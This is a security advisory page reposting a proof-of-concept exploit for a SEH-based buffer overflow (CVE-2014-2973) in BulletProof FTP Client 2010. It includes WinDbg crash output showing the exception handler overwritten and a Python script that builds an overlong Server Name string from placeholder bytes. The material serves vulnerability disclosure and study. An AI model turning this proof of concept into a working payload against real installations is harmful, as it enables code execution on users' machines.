BulletProof FTP Client 2010 Buffer Overflow

2014.07.25
Credit: Gabor Seljan
Risk: High
Local: Yes
Remote: No
CWE: CWE-119

#-----------------------------------------------------------------------------# # Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) # # Date: Jul 24 2014 # # Exploit Author: Gabor Seljan # # Software Link: http://www.bpftp.com/ # # Version: 2010.75.0.76 # # Tested on: Windows XP SP3 # # CVE: CVE-2014-2973 # #-----------------------------------------------------------------------------# ''' (a00.9e4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=41414141 ebx=41414141 ecx=007ef590 edx=00000000 esi=017a4f6a edi=017a516a eip=005c005b esp=0012f594 ebp=0012f610 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 *** ERROR: Symbol file could not be found. Defaulted to export symbols for bpftpclient.exe - bpftpclient+0x1c005b: 005c005b f6431c10 test byte ptr [ebx+1Ch],10h ds:0023:4141415d=?? 0:000> !exchain 0012f59c: bpftpclient+1c044e (005c044e) 0012f5a8: bpftpclient+1c046b (005c046b) 0012f618: 43434343 Invalid exception stack at 42424242 0:000> g (a00.9e4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=43434343 edx=7c9032bc esi=00000000 edi=00000000 eip=43434343 esp=0012f1c4 ebp=0012f1e4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 43434343 ?? ??? ''' #!/usr/bin/python junk1 = b'\x41' * 89 nSEH = b'\x42' * 4 SEH = b'\x43' * 4 junk2 = b'\x44' * 1000 sploit = junk1 + nSEH + SEH + junk2 try: print('[+] Creating exploit file...') f = open('sploit.txt', 'wb') f.write(sploit) f.close() print('[+] Exploit file created successfully!') except: print('[!] Error while creating exploit file!') print('[+] Use the following as Server Name/IP with any user\'s credentials!') print(sploit.decode())


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top